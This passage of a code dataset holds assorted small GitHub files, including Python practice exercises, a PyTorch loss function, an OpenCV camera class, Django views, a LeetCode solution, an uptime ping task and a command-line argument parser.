word2 in sent2:\r\n if word1 == word2:\r\n common.append(word1)\r\n\r\n for word in sent1:\r\n if word not in common:\r\n not_common.append(word)\r\n\r\n for word in sent2:\r\n if word not in common:\r\n not_common.append(word)\r\n\r\n return common, not_common\r\n\r\n\r\n# Given k numbers which are less than n, return the set of prime number among them\r\n# Note: The task is to write a program to print all Prime numbers in an Interval.\r\n# Definition: A prime number is a natural number greater than 1 that has no positive divisors other than 1 and itself.\r\n\r\nn = 35\r\n\r\n\r\ndef solution3(num):\r\n\r\n primes = set()\r\n for i in range(2, num):\r\n prime_flag = 0\r\n for j in range(2, i):\r\n if i % j == 0:\r\n prime_flag = 1\r\n\r\n if prime_flag == 0:\r\n primes.add(i)\r\n\r\n return primes\r\n\r\n\r\nprint(solution3(n))\r\n","repo_name":"lukekasper/Personal-Projects","sub_path":"Python_Practice/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42142143888","text":"def main():\n repeat= int(input(\"¿Cuantos usuarios quieres introducir?: \"))\n username = list()\n departament = list()\n classroom = list()\n for i in range(repeat):\n username.append(str(input(\"\\n¿Cual es el nombre del alumno?: \")))\n departament.append(str(input(\"¿Cual es el nombre del departamento?: \")))\n classroom.append(int(input(\"¿Que número tiene la clase?: \")))\n while 1 < classroom[-1] > 15:\n classroom.append(int(input(\"¿Vuelve a introducir el número que 
tiene la clase?(1-15): \")))\n students = {\n \"username\": username,\n \"departament\": departament,\n \"classroom\": classroom\n }\n for y in students:\n print(\"\\n |\", students[y], end=\" | \\n\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Hbohera/PG-UF1-Python","sub_path":"Ejercicio3.py","file_name":"Ejercicio3.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72116335523","text":"import torch.nn as nn\nimport torch\nimport numpy as np\nimport model\nfrom typing import List\n\npos_weight = torch.ones([len(model.bboxs)]) # All weights are equal to 1\ncriterion = torch.nn.BCEWithLogitsLoss(pos_weight=pos_weight)\n\nl2_loss_func = nn.MSELoss(reduction='sum')\n\n# Target 0, 1\n# Output 0, 1\n\n\n\ndef loss_fn(output, target):\n #plane_count = torch.sum(target) # 10\n #if plane_count == 0:\n # plane_count = torch.tensor(1)\n\n # l1_loss = torch.abs(torch.sub(output, target))\n \n l2_loss = l2_loss_func(output, target)\n\n #LM_CONSTANT = (1/l2_loss)*0.4\n loss = l2_loss #+ (torch.sum(torch.clamp(target - output, min=0, max=1)) / plane_count)*LM_CONSTANT\n return loss\n # return nn.BCELoss()(output, target)\n #return nn.CrossEntropyLoss()(output, target)\n #scale = 1000\n # print('newly loaded 3')\n # print('output', output)\n # print('target', target)\n #diff = torch.sub(target, output)\n # print('difference ', diff)\n #scaled = torch.mul(diff, scale)\n # print('Scaled ', scaled)\n #squared = torch.square(scaled)\n # print('squared ', squared)\n #sum_loss = torch.sum(squared)\n # print('sum_loss', sum_loss)\n #loss = torch.div(sum_loss, torch.numel(target))\n # print('loss', loss)\n #plane_count = torch.sum(target)\n\n #return loss\n # print('plane_count', plane_count)\n #if plane_count == 0:\n # return loss\n #else:\n # loss = torch.divide(loss, plane_count)\n # #print('after divide', loss)\n # return loss\n\n\ndef calculate_target_vector(bboxs: List[List[float]]):\n target_vector = np.zeros(len(model.np_bboxs))\n for bbox in bboxs:\n xA = np.maximum(model.np_bboxs[:, 0], bbox[0])\n yA = np.maximum(model.np_bboxs[:, 1], bbox[1])\n xB = np.minimum(model.np_bboxs[:, 2], bbox[2])\n yB = np.minimum(model.np_bboxs[:, 3], bbox[3])\n interArea = np.maximum(0, xB - xA + 1) * np.maximum(0, yB - yA + 1)\n boxAArea = (model.np_bboxs[:, 2] - model.np_bboxs[:, 0] + 1) * \\\n (model.np_bboxs[:, 3] - model.np_bboxs[:, 1] + 1)\n boxBArea = (bbox[2] - bbox[0] + 1) * \\\n (bbox[3] - bbox[1] + 1)\n iou = np.divide(interArea, (np.subtract(\n np.add(boxAArea, boxBArea), interArea)))\n b = np.zeros_like(iou)\n\n arg_best_match = np.argmax(iou, axis=0)\n if iou[arg_best_match] != 0:\n b[arg_best_match] = 1\n target_vector += b\n\n return target_vector","repo_name":"arturfabricio/aircraft-detection","sub_path":"src/training_utilities.py","file_name":"training_utilities.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"73925794081","text":"import cv2 as cv\r\n\r\n\r\nclass Camera:\r\n\r\n\r\n def __init__(self):\r\n self.camera = cv.VideoCapture(0, cv.CAP_DSHOW)\r\n self.roi_color = 0\r\n\r\n if not self.camera.isOpened():\r\n raise ValueError(\"Unable to Open Camera!\")\r\n\r\n self.width = self.camera.get(cv.CAP_PROP_FRAME_WIDTH)\r\n self.height = self.camera.get(cv.CAP_PROP_FRAME_HEIGHT)\r\n\r\n def __del__(self):\r\n if self.camera.isOpened():\r\n self.camera.release()\r\n\r\n def 
get_frame(self):\r\n if self.camera.isOpened():\r\n ret, image = self.camera.read()\r\n image_gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\r\n self.face_cascade = cv.CascadeClassifier(\"E:/Face Mask Detection/haarcascade_frontalface_default.xml\")\r\n self.faces = self.face_cascade.detectMultiScale(image_gray, scaleFactor=1.1, minNeighbors=5,\r\n minSize=(30, 30), flags=cv.CASCADE_SCALE_IMAGE)\r\n for (x, y, w, h) in self.faces:\r\n cv.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n self.roi_color = image[y:y + h, x:x + w]\r\n cv.imwrite('frame.jpg', self.roi_color)\r\n\r\n\r\n\r\n if ret:\r\n return (ret, cv.cvtColor(image, cv.COLOR_BGR2RGB))\r\n else:\r\n return (ret, None)\r\n else:\r\n return None","repo_name":"Ashu-4638/Face-Mask-Detection","sub_path":"Camera.py","file_name":"Camera.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23363213671","text":"from django.shortcuts import render\nfrom mywatchlist.models import BarangMywatchlist\nfrom django.http import HttpResponse\nfrom django.core import serializers\n\ndef show_mywatchlist_html(request):\n data_barang_mywatchlist = BarangMywatchlist.objects.all()\n\n done = 0\n size = 0\n message = \"Wah, kamu masih sedikit menonton!\"\n for data in data_barang_mywatchlist:\n size += 1\n if (data.watched == True):\n done += 1\n\n not_done = size - done\n if (done >= not_done):\n message = \"Selamat, kamu sudah banyak menonton!\"\n\n context = {\n \"nama\" : \"Amanda Nurul Izzah\",\n \"student_id\" : \"2106634080\",\n \"list_barang\" : data_barang_mywatchlist,\n \"message\" : message\n }\n\n return render(request, \"mywatchlist.html\", context)\n\ndef show_mywatchlist_json(request):\n data = BarangMywatchlist.objects.all()\n return HttpResponse(serializers.serialize(\"json\", data), content_type=\"application/json\")\n\ndef show_mywatchlist_xml(request):\n data = BarangMywatchlist.objects.all()\n return HttpResponse(serializers.serialize(\"xml\", data), content_type=\"application/xml\")\n","repo_name":"amrul-hzz/tugas-pbp","sub_path":"mywatchlist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41210118202","text":"import numpy as np\r\nimport random\r\nimport statistics as stat\r\n\r\nrandom.seed(0)\r\n\r\nprint(\"Part b\")\r\nH = []\r\nfor i in range(1,6):\r\n r = [1 / (i + j - 1) for j in range(1,6)]\r\n H.append(r)\r\nH = np.array(H)\r\n\r\nprint(\"Hilbert Matrix\")\r\nfor r in H:\r\n print(str(r))\r\n\r\n# Part c\r\nU , S , VT = np.linalg.svd(H)\r\n\r\nprint(\"\\nPart d\")\r\nk2 = max(S) / min(S)\r\nprint(\"k2: \" + str(k2))\r\n\r\n# Part e\r\ndef randomUnitVector():\r\n v = np.array([random.randrange(-100000 , 100000) for i in range(5)])\r\n return [x / np.linalg.norm(v) for x in v]\r\n\r\ndef getKxy(x , y , H):\r\n return np.linalg.norm((H @ y)) / np.linalg.norm((H @ x))\r\n\r\ndef partE(H):\r\n K = []\r\n for i in range(10):\r\n x = np.array(randomUnitVector())\r\n y = np.array(randomUnitVector())\r\n K.append(getKxy(x , y , H))\r\n return max(K) , min(K) , stat.mean(K) , stat.stdev(K)\r\n\r\nprint(\"\\nPart e\")\r\nlab = [\"Max: \" , \"Min: \" , \"Mean: \" , \"SD: \"]\r\ndat = partE(H)\r\nfor i in range(4):\r\n print(lab[i] + str(dat[i]))\r\n\r\nprint(\"\\nPart f\")\r\nk = getKxy(VT[4] , VT[0] , H)\r\nprint(\"K(v_5 , v_1): \" + 
str(k))","repo_name":"lVicholas/Class_Code","sub_path":"Linear_Algebra_for_Data_Science/MAS4115.HW7.py","file_name":"MAS4115.HW7.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36953219966","text":"# https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iii/submissions/\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n length = len(prices)\n if len(prices) == 0:\n return 0\n\n dp = [[0] * 4 for _ in range(length)]\n dp[0][0] = -prices[0]\n dp[0][2] = -prices[0]\n\n for i in range(1, length):\n dp[i][0] = max(dp[i - 1][0], -prices[i])\n dp[i][1] = max(dp[i - 1][1], dp[i - 1][0] + prices[i])\n dp[i][2] = max(dp[i - 1][2], dp[i - 1][1] - prices[i])\n dp[i][3] = max(dp[i - 1][3], dp[i - 1][2] + prices[i])\n\n return dp[-1][3]\n","repo_name":"AlfredTheBest/leetcode","sub_path":"examples/dynamic-programming/stock/123-best-time-to-uy-and-sell-stock-iii.py","file_name":"123-best-time-to-uy-and-sell-stock-iii.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28021946662","text":"from .GenericTask import GenericTask\nfrom apps.helpers.HttpRequest import HttpRequest, HttpMockBackend\nfrom requests.exceptions import HTTPError\nfrom django.conf import settings\n\n\nclass HttpPingTask(GenericTask):\n\n def __init__(self, task=None):\n super(HttpPingTask, self).__init__(task=task)\n if task.get('url') is None:\n raise Exception('url must be set for http_ping')\n\n if self.task.get('ok_resp') is not None and isinstance(self.task['ok_resp'], list):\n self.ok_resp = self.task['ok_resp']\n else:\n self.ok_resp = [200, 301]\n\n def run(self):\n super(HttpPingTask, self).run()\n resp_code = None\n try:\n if settings.TESTING:\n requests = HttpRequest(backend=HttpMockBackend())\n response = requests.get(url=self.task['url'], allow_redirects=False, timeout=self.task.get('timeout'))\n resp_code = response.status_code\n self.timings = (0, 0, int(response.elapsed.total_seconds() * 1000))\n response.raise_for_status()\n except HTTPError as http_err:\n return False, resp_code, str(http_err), self.timings\n except Exception as err:\n return False, resp_code, str(err), self.timings\n else:\n return self.ok_resp.count(resp_code) > 0, resp_code, 'Open {}: {} in {} = {}; total {}s'.format(\n self.task['url'], resp_code, str(self.ok_resp),\n str(self.ok_resp.count(resp_code) > 0), self.timings[2]/1000\n ), self.timings\n","repo_name":"utking/uptime_monitor","sub_path":"apps/helpers/HttpPingTask.py","file_name":"HttpPingTask.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70911360163","text":"import os\nimport re\n\nimport torch\n\nfrom src.data.gnn.utils import prepare_files\n\ngnn_number_pattern = re.compile(r\"-n[0-9]+-\")\n\n# remove gnns that do not reach perfect training\n\npath = \"./data/gnns_v4/\"\nlog_file = \"formulas_v4.json.5.log\"\nmodel_hash = \"40e65407aa\"\n\nformula_path = os.path.join(path, model_hash)\ncleaned_path = os.path.join(formula_path, \"cleaned\")\nos.makedirs(cleaned_path, exist_ok=True)\n\nformula_hash_to_file = prepare_files(path=formula_path)\n\ncurrent_formula_hash = None\ncurrent_formulas = []\ncurrent_gnn_index = 0\ncleaned_formulas = []\n\nmax_iteration_reached = False\n\nskip_hashes = set()\n\nwith open(os.path.join(path, \"logs\", log_file)) 
as f:\n for line in f:\n _current_formula_hash = line[:10]\n if _current_formula_hash in skip_hashes:\n continue\n if current_formula_hash != _current_formula_hash:\n if current_formula_hash is not None:\n # save what we have and reset\n current_file = formula_hash_to_file[current_formula_hash]\n number_pattern = gnn_number_pattern.search(current_file)[0]\n formula_file_cleaned = current_file.replace(\n number_pattern, f\"-n{str(len(cleaned_formulas))}-\"\n )\n\n print(f\"saving formula {current_formula_hash}\")\n torch.save(\n cleaned_formulas, os.path.join(cleaned_path, formula_file_cleaned)\n )\n\n cleaned_formulas = []\n current_gnn_index = 0\n\n if _current_formula_hash not in formula_hash_to_file:\n print(f\"Skiping hash {_current_formula_hash}\")\n skip_hashes.add(_current_formula_hash)\n current_formula_hash = None\n continue\n\n current_formula_hash = _current_formula_hash\n formula_file = formula_hash_to_file[current_formula_hash]\n current_formulas = torch.load(os.path.join(formula_path, formula_file))\n\n if \"Training model\" in line:\n current_gnn_index = int(line.split(\"Training model \")[1].split(\"/\")[0]) - 1\n max_iteration_reached = False\n\n # hardcoded max 15 iterations\n # no need to check for macro/micro, it should have ended before\n # if it had had reached the expected result.\n # also, INFO 15 is still allowed if DEBUG 15 does not exist\n # this also avoids the change on avg precision\n if \"\"\"src.run_logic DEBUG \" 15\"\"\" in line:\n max_iteration_reached = True\n\n # basically if DEBUG 15 exists, then the trainig stopped for iteration limit\n # no for condition check\n if \"\"\"src.run_logic INFO\"\"\" in line and not max_iteration_reached:\n print(f\"Adding gnn {current_gnn_index} - on hash {current_formula_hash}\")\n cleaned_formulas.append(current_formulas[current_gnn_index])\n\n max_iteration_reached = False\n\n if cleaned_formulas and current_formula_hash is not None:\n # when finished, save what is left\n current_file = formula_hash_to_file[current_formula_hash]\n number_pattern = gnn_number_pattern.search(current_file)[0]\n formula_file_cleaned = current_file.replace(\n number_pattern, f\"-n{str(len(cleaned_formulas))}-\"\n )\n\n print(f\"saving formula {current_formula_hash}\")\n torch.save(cleaned_formulas, os.path.join(cleaned_path, formula_file_cleaned))\n","repo_name":"juanpablos/GNN-explain","sub_path":"_clean_networks.py","file_name":"_clean_networks.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18088677745","text":"# faz a solicitação de número inteiro dentro do while\n# verifica se é maior que zero (se for, imprime na tela o que ele é e peda mais números)\n# identifica se é zero ou maior que zero e faz a mesma coisa do passo anterior\n# garantir que o usuário digitará 10 números\n\ni = 0\n\nwhile i < 10:\n num = float(input('Digite um número inteiro: '))\n numt = int(num // 1)\n if numt < 0:\n print('Número é menor que zero')\n elif numt == 0:\n print('Número é zero')\n elif numt > 0:\n print('Número é positivo')\n i += 1","repo_name":"GalegoSonolento/Exercicios_Algorit_Prog_Fund_Unisinos","sub_path":"Aula 7/Fixação while 2/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24023436383","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '1.2'\n\nsetup(name='StockTrader',\n 
version=version,\n description=\"It helps one know the value of their stock\",\n long_description=\"\"\"\\\nThis application lets you know the value of your stock in an instant, without having to surf the net and going through links with umpteen ads. It also shows you current situation of the market! It also gives updates as to how much it has increased/decreased in that day. More updates coming soon, will give more features.\"\"\",\n classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n keywords='stock stocktrader bse nse market bear bearish bull bullish profit loss share shares stocks price value',\n author='Madhur Adlakha',\n author_email='madhuradlakha@yahoo.co.in',\n url='www.madhuradlakha.com',\n license='NA',\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data=True,\n zip_safe=True,\n install_requires=[\n # -*- Extra requirements: -*-\n ],\n entry_points=\"\"\"\n # -*- Entry points: -*-\n \"\"\",\n )\n","repo_name":"madhuradlakha/stocktrader","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"35378779114","text":"#!/usr/bin/python\n'''\n\n For piping between bedSeq program from Python scripts\n\n'''\n\ndef toStrArray(L):\n\tL2=[]\n\tfor x in L:\n\t\tL2.append(str(x))\n\t\n\treturn L2\n\n\nfrom subprocess import *\n\nfrom sys import *\n\ndefaultBedSeqCommand=[\"bedSeq\",\"\",\"/dev/stdin\",\"bed\"]\n\nclass BedSeqClient:\n\tchild_stdin=None\n\tchild_stderr=None\n\tchild_stdout=None\n\tdef __init__(self,seqDir,bedType,extraParams=None,bedSeqProgramName='bedSeq',inputFileName='/dev/stdin'):\n\t\tparam=[bedSeqProgramName,seqDir,inputFileName,bedType,\"--print-OK\"]\n\t\tif extraParams:\n\t\t\tparam.extend(extraParams)\n\t\t\t\t\t\n\t\tp=Popen(\" \".join(param), shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=True)\n\t\t(self.child_stdin,self.child_stdout,self.child_stderr)=(p.stdin,p.stdout,p.stderr)\n\t\n\tdef getBedSeq(self,bedentry):\n\t\tif type(bedentry).__name__==\"list\":\n\t\t\tbedentry=\"\\t\".join(toStrArray(bedentry))\n\t\t\n\t\tprint >> self.child_stdin,bedentry\n\t\t\n\t\terror=self.child_stderr.readline().strip()\n\t\t\n\t\tif error==\"OK\":\n\t\t\tresult=self.child_stdout.readline().strip()\n\t\t\treturn result\n\t\telse:\n\t\t\traise ValueError\n\t\t\t\n\tdef getSeq(self,bedentry):\n\t\tresult=self.getBedSeq(bedentry)\n\t\tfields=result.split(\"\\t\")\n\t\treturn fields[-1]\n\t\t\t\n\tdef close(self):\n\t\tself.child_stdin.close()\n\t\tself.child_stdout.close()\n\t\tself.child_stderr.close()\n\t\t\t\n\n\nif __name__=='__main__':\n\tprogramName=argv[0]\n\targs=argv[1:]\n\ttry:\n\t\tseqDir,=args\n\texcept:\n\t\tprint >> stderr,programName,\"seqDir\",\"> ofile\"\n\t\texit()\n\t\n\ttries=[\"chr10\\t100225000\\t100225200\",\"chr\",\"chr12\\t11125235\\t11125256\"]\n\tbedSeqClient=BedSeqClient(seqDir,\"bed\")\n\tfor tri in tries:\n\t\ttry:\n\t\t\tprint >> stdout,bedSeqClient.getBedSeq(tri)\n\t\texcept:\n\t\t\tpass\n\tbedSeqClient.close()\n\t","repo_name":"albertwcheng/bedSeq","sub_path":"BedSeqUtil.py","file_name":"BedSeqUtil.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2319252145","text":"from utils import move\n\n\ndef next_move(L, C, i, j, l):\n n = len(L)\n n_minus1 = n - 1\n # compute the constituent kernel for search status\n # as 
the incumbent combined kenerl\n\n if (n_minus1 * i + j >= n_minus1 * l):\n idx_l = L.index(l)\n (next_i, next_j) = (idx_l, idx_l + 1)\n elif (j < n_minus1):\n (next_i, next_j) = (i, j + 1)\n else:\n (next_i, next_j) = (i + 1, i + 2)\n print(\"Constituent Kernel\", next_i, \"->\", next_j, \"for statuts (\", i, j, l, \")\")\n # compute constituent kernel for every conflict\n for c in C:\n (cons_i, cons_j) = (n_minus1, n_minus1 + 1)\n for (a, b) in c:\n (idx_a, idx_b) = (L.index(a), L.index(b))\n # break if the conflict is resolved by the incumbent combined kernel\n if (a <= l) and (n * idx_a + idx_b) <= (n * next_i + next_j):\n (cons_i, cons_j) = (0, 0)\n break\n # update the constituent kernel\n if (a <= l) and (n * idx_a + idx_b) < (n * cons_i + cons_j):\n (cons_i, cons_j) = (idx_a, idx_b)\n print(\"Constituent Kernel\", cons_i, \"->\", cons_j, \"for conflict\", c)\n # break when a unsolvable conflict is detected\n if cons_i > l: return (n_minus1, n_minus1 + 1)\n # update the combined kernel\n if (n * next_i + next_j) < (n * cons_i + cons_j):\n (next_i, next_j) = (cons_i, cons_j)\n # print(\"Combined Kernel:\", next_i, \"->\", next_j)\n return (next_i, next_j)\n\n\ndef phi_consistent(L, Phi):\n for phi in Phi:\n phi_consistent = False\n for (a, b) in phi:\n (idx_a, idx_b) = (L.index(a), L.index(b))\n if idx_a < idx_b:\n phi_consistent = True\n break\n if not phi_consistent:\n # print(\"Inconsistent! Violate \", phi)\n return False\n # print(\"Phi Consistent!\")\n return True\n\n\ndef phi_conflicts(L, Phi):\n C = []\n for phi in Phi:\n c = []\n for (a, b) in phi:\n (idx_a, idx_b) = (L.index(a), L.index(b))\n c.append((b, a))\n if idx_a < idx_b:\n c = []\n break\n # print(\"Conflict:\", c, \"for \", phi)\n if c: C.append(c)\n print(\"Conflict:\", C)\n return C\n\n\ndef conflicts2clauses(C):\n Phi = []\n for c in C:\n phi = []\n for (a, b) in c:\n phi.append((b, a))\n Phi.append(phi)\n return Phi\n\n\ndef cdito(L, P, Phi, h):\n n_minus1 = len(L) - 1\n times = 0\n while P and times < 100:\n times = times + 1\n print(\"\\n\")\n print(\"#\", times)\n print(\"L =\", L)\n print(\"P =\", P)\n # print(\"Phi = \", Phi)\n if phi_consistent(L, Phi):\n (h_consistent, Ch) = h(L)\n if h_consistent:\n print(\"Solution Found\")\n return L\n else:\n Phi = Phi + conflicts2clauses(Ch)\n (i, j, l) = P[-1]\n C = phi_conflicts(L, Phi)\n (next_i, next_j) = next_move(L, C, i, j, l)\n print(\"Combined Kernel:\", next_i, \"->\", next_j)\n if next_i < l:\n L = move(L, next_i, next_j)\n P[-1] = (next_i, next_j, l)\n P.append((0, 0, next_i))\n print(\"[Type 1] Move to\", L)\n else:\n P.pop()\n if P:\n (parent_i, parent_j, parent_l) = P[-1]\n L = move(L, parent_j, parent_i - 1)\n print(\"Backtrack to\", L, \"by taking\", \"(\" + repr(parent_j) + \" ,\" + repr(parent_i - 1) + \")\")\n if l < next_i < n_minus1:\n print(\"[Type 2] Update Parent's Status for Moving to a Sibling\")\n P[-1] = (parent_i, next_j - 1, parent_l)\n if next_i == n_minus1:\n print(\"[Type 3] Update Parent's Status for Pruning\")\n P[-1] = (parent_i + 1, parent_i + 1, parent_l)\n print(\"No Solution!\")\n return []","repo_name":"jkchengh/CDITO","sub_path":"cdito.py","file_name":"cdito.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36433998928","text":"class PriorityQueueSlow:\n def __init__(self):\n self.data = []\n self.size = 0\n \n\n def insert(self, value):\n self.data.append(value)\n self.size += 1\n \n def extract_min(self):\n if 
self.size == 0:\n return None\n\n cur_min = self.data[0]\n cur_min_loc = 0\n for i in range(1, self.size):\n if self.data[i] < cur_min:\n cur_min = self.data[i]\n cur_min_loc = i\n\n del self.data[cur_min_loc]\n self.size -= 1\n return cur_min","repo_name":"Youssef-Rachad/ESC180_ESC190_notes","sub_path":"esc190/data_structures/pq_slow.py","file_name":"pq_slow.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19505484602","text":"# class Vehicle:\n#\n# # colour = \"White\"\n#\n# def __init__(self, name, max_speed, mileage, colour=\"White\", capacity):\n# self.name = name\n# self.max_speed = max_speed\n# self.mileage = mileage\n# self.colour = colour\n# self.capacity = capacity\n#\n# def print(self):\n# print(f\"Colour: {self.colour}, Vehicle Name: {self.name}, Speed: {self.max_speed}, Mileage: {self.mileage}\")\n#\n# def seating_capacity(self, capacity):\n# return f\"The seating capacity of a {self.name} is {capacity} passengers.\"\n#\n# def fare(self):\n# return self.capacity * 100\n#\n#\n# class Bus(Vehicle):\n# # def print(self):\n# # print(f\"Vehicle Name: {self.name} Speed: {self.max_speed} Mileage: {self.mileage}\")\n# def seating_capacity(self, capacity=50):\n# return super().seating_capacity(capacity)\n#\n# def fare(self, capacity=50):\n# return self.capacity * 100\n#\n# class Car(Vehicle):\n# pass\n#\n#\n# School = Bus(\"School Volvo\", 180, 12, \"White\", 50)\n# Audi_Q5 = Car(\"Audi Q5\", 240, 18, \"\", 4)\n# School.print()\n# Audi_Q5.print()\n# print(School.seating_capacity())\n\nclass Vehicle:\n def __init__(self, name, mileage, capacity):\n self.name = name\n self.mileage = mileage\n self.capacity = capacity\n\n def fare(self):\n return self.capacity * 100\n\n\nclass Bus(Vehicle):\n def fare(self):\n # return self.capacity * 100 * 1.1\n amount = super().fare()\n amount += amount * 10 / 100\n return amount\n\n\nSchool_bus = Bus(\"School Volvo\", 12, 50)\nprint(\"Total Bus fare is:\", School_bus.fare())\nprint(type(School_bus))\nprint(isinstance(School_bus, Vehicle))\n","repo_name":"yfp-c/eng103a-python","sub_path":"Classes_Practice/practice_4_vehicle.py","file_name":"practice_4_vehicle.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23512686081","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n\nfrom pyecs import *\nfrom pycompupipe.components import PygameSurface, BlitSurface, GuiElement\n\nimport mock\nimport pygame\n\nfrom testing import *\n\nclass TestBlitSurface():\n\n @mock.patch(\"pycompupipe.components.pygame_components.blit_surface.BlitSurface.draw\")\n def test_event(self, mocked_draw):\n e = Entity()\n s = e.add_component(PygameSurface((10,10)))\n d = e.add_component(BlitSurface(\"draw\",10))\n screen = mock.NonCallableMock()\n e.fire_callbacks(\"draw\", screen)\n mocked_draw.assert_called_once_with(screen)\n\n def test_draw(self):\n size = (100,100)\n size2 = (100,50)\n \n screen = pygame.Surface(size)\n\n screen.fill((0,0,0))\n\n e = Entity()\n s = e.add_component(PygameSurface(size2))\n d = e.add_component(BlitSurface(\"draw\"))\n\n s.surface.fill((255,255,255))\n d.draw(screen)\n\n assert (pygame.surfarray.pixels3d(screen)[:size2[0],:size2[1]] == (255,255,255)).all()\n assert (pygame.surfarray.pixels3d(screen)[:size2[0],size2[1]:] == (0,0,0)).all()\n\n \n @forEach(\"x\",lambda:iter([0,50,80]))\n @forEach(\"y\",lambda:iter([0,50,80]))\n def 
test_draw_xy(self, x, y):\n size = (100,100)\n size2 = (1,1)\n \n screen = pygame.Surface(size)\n\n screen.fill((0,0,0))\n\n e = Entity()\n s = e.add_component(PygameSurface(size2))\n g = e.add_component(GuiElement((x,y)))\n d = e.add_component(BlitSurface(\"draw\"))\n\n s.surface.fill((255,255,255))\n d.draw(screen)\n\n assert (pygame.surfarray.pixels3d(screen)[x,y] == (255,255,255)).all()\n\n def test_str(self):\n d = BlitSurface(\"draw\")\n assert str(d) == \"BlitSurface(draw)\"\n ","repo_name":"xaedes/PyCompuPipe","sub_path":"tests/components/pygame_components/test_blit_surface.py","file_name":"test_blit_surface.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36285769101","text":"\"\"\"\nThis file contains utility functions for configuring the IsiDataInsightsDaemon\nvia command line args and config file.\n\"\"\"\nimport argparse\nimport configparser\nimport getpass\nimport logging\nimport os\nimport re\nimport sys\nimport urllib3\n\nfrom ast import literal_eval\n\nLOG = logging.getLogger(__name__)\nDEFAULT_LOG_FILE = \"./data_collectors.log\"\nDEFAULT_LOG_LEVEL = \"INFO\"\n\ndef _log_level_str_to_enum(log_level):\n if log_level.upper() == \"DEBUG\":\n return logging.DEBUG\n elif log_level.upper() == \"INFO\":\n return logging.INFO\n elif log_level.upper() == \"WARNING\":\n return logging.WARNING\n elif log_level.upper() == \"ERROR\":\n return logging.ERROR\n elif log_level.upper() == \"CRITICAL\":\n return logging.CRITICAL\n else:\n print(\"Invalid logging level: {}, setting to INFO.\".format(log_level))\n return logging.INFO\n\ndef parse_cli():\n \"\"\"\n Setup the command line args and parse them.\n \"\"\"\n argparser = argparse.ArgumentParser(description='Starts Isilon Data Collector Process.')\n argparser._action_groups.pop()\n required = argparser.add_argument_group('Required arguments')\n optional = argparser.add_argument_group('Optional arguments')\n required.add_argument('--host', help=\"Specifies promotheus host ip or name\")\n optional.add_argument('--path', help=\"Specifies directory to save output\", nargs='?', const='./', default='./')\n required.add_argument('--metric', help=\"Specifies metric name\")\n optional.add_argument('--start', help=\"Specifies query start time\")\n optional.add_argument('--end', help=\"Specifies query end time\")\n optional.add_argument('--time', help=\"Specifies query time\")\n optional.add_argument('--query', help=\"Specifies query type\")\n optional.add_argument('--time_range', help=\"Specifies time range in seconds\")\n optional.add_argument('--func', help=\"Specifies fucntion to apply on metric\")\n #optional.add_argument('--prometheus_user', help=\"Specifies Prometheus username\")\n #optional.add_argument('--prometheus_passwd', help=\"Specifies prometheus user password\")\n #optional.add_argument('--config', help=\"Specifies All configurations\", nargs='?', const='config.json', default='config.json')\n #optional.add_argument('--isilon_ssl', help=\"Specifies whether SSL verification should be done on Isilon host. Default value is n \", nargs='?', const='n', default='n')\n #required.add_argument('--isilon_stats', help=\"Specifies Statistics to retrieve from Isilon host. valid values are {0}\".format(STATS_NAME.keys()) )\n #required.add_argument('--influx_host', help=\"Specifies InfluxDB host ip. 
